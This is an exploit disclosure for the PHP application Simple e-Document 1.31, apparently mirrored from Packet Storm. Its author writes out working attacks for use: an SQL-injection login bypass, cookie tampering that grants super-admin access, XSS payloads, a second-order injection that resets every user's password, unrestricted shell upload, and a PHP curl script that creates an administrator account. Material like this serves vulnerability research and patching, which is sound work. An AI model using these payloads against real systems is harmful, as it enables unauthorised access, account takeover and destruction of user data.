Lucene search
K

Simple e-Document 1.31 SQL Injection / XSS / CSRF / File Upload

🗓️ 26 Jan 2014 00:00:00Reported by PuN!Sh3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 38 Views

Vulnerabilities in Simple e-Document v1.31: SQL Injection, XSS, CSRF, File Uploa

Code
`#################################################################################  
[+]Exploit: Simple e-document v1.31 => Sql inj,Login Bypass,XSS,Insecure  
#  
Cookie Handling(privilege escalation),Arbitrary File Upload,  
#  
Second order injections, CSRF ,Insecure logout process  
#  
[+] Author: PuN!Sh3r  
#  
[+] Contact: http://anti-armenia.org  
#  
[+] version: Simple e-document v1.31  
#  
[+] Vendor Homepage: http://sourceforge.net/projects/simplee-doc/files/  
#  
#################################################################################  
  
Hi everyone.I want to talk about some vulnerabilities which i have found in  
Simple e-document script's sources.It has a lot issues.  
  
Let's go...  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
1.Sql Injection(multiple=>there is exist another bugs.you can find them  
same tecniques).  
  
admin.php  
---------  
Snip:  
  
$sql = "Insert into edocphp_users values('', '$username', '$r_password',  
'$NOW_TIME', '$is_admin', '$is_s_admin')";  
  
And $username, $r_password had not been sanitized.  
  
-------  
main_out.php( Vulnerable from head to bottom of page :D )  
main_in.php (It is also :D )  
-------  
  
  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
2. Bypass login:  
  
index.php  
---------  
  
write username : 'or 1=1 #  
password : blank  
  
And you will login successfull..  
  
Vulnerable snip:  
...  
$username= stripslashes($_POST['username']);  
$password= stripslashes($_POST['password']);  
..  
$sql = "SELECT * From edocphp_users WHERE username='$username' AND  
password ='$r_password'";  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
3.Insecure cookie handling(Privilege escalation):  
  
There is an issue with creating cookies after you login to system.  
if you are simple user your cookie will be that username=Your username;  
access=1;  
You can change cookie part: change access 1 to 3 for capturing super  
administrative access.  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
4.XSS  
  
index.php  
---------  
$_COOKIE['username'] is not sanitized and you can change it to ,for  
example,<script>alert(document.cookie)</script>  
and boom :D XSS appears..  
This vuln is also exist in header_out.php and admin.php :  
  
admin.php  
----------  
Go to the View/Edit/Remove Users and after clicking update intrecept  
request and type that:  
  
new_password=11111&is_admin=3&username_s=<script>alert()</script>&id=3&op=Update_User  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
5.Arbitrary File Upload  
There is not any restriction in upload.php and you can upload your own  
shell and enjoy :)  
  
http://site.tld/script_path/upload.php?op=newin  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
6.Second order injections  
You can change all users' passwords in the database with this vuln(Also  
delete):  
-----  
admin.php  
-----  
  
Go to the View/Edit/Remove Users.  
Change any of these pass to your own  
After clicking update intrecept request with BurpSuite (or OwaspZap etc.)  
and change this  
new_password=&is_admin=3&username_s=admin&id='or 1=1#&op=Update_User  
After this process all users' pass will be changed..  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
7.CSRF  
  
This script doesn't have any session,for this reason you can add new super  
admin.I have written a simple payload for it:  
Payload:  
  
<?php  
$url="http://localhost/simple_e_document/admin.php";  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt ($ch, CURLOPT_POST, 1);  
curl_setopt ($ch, CURLOPT_POSTFIELDS,  
"username=admin&password=123456&is_admin=2&op=save_new_user");  
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_COOKIE, "username=FuckTheSystem;access=3");  
$a = curl_exec ($ch);  
echo $a;  
curl_close ($ch);  
?>  
  
Change current values with your own.  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
8.Insecure logout process.  
You can force this proces to change its behaviour.For example,if you press  
logout process,this post action happens :  
  
op=logout&username= ANY USERNAME &Submit=Logout  
you can change username value and make script to logout site for this user.  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
Respect to my all brothezz..  
Anti-armenia team/ http://anti-armenia.org  
./PuN!Sh3r  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation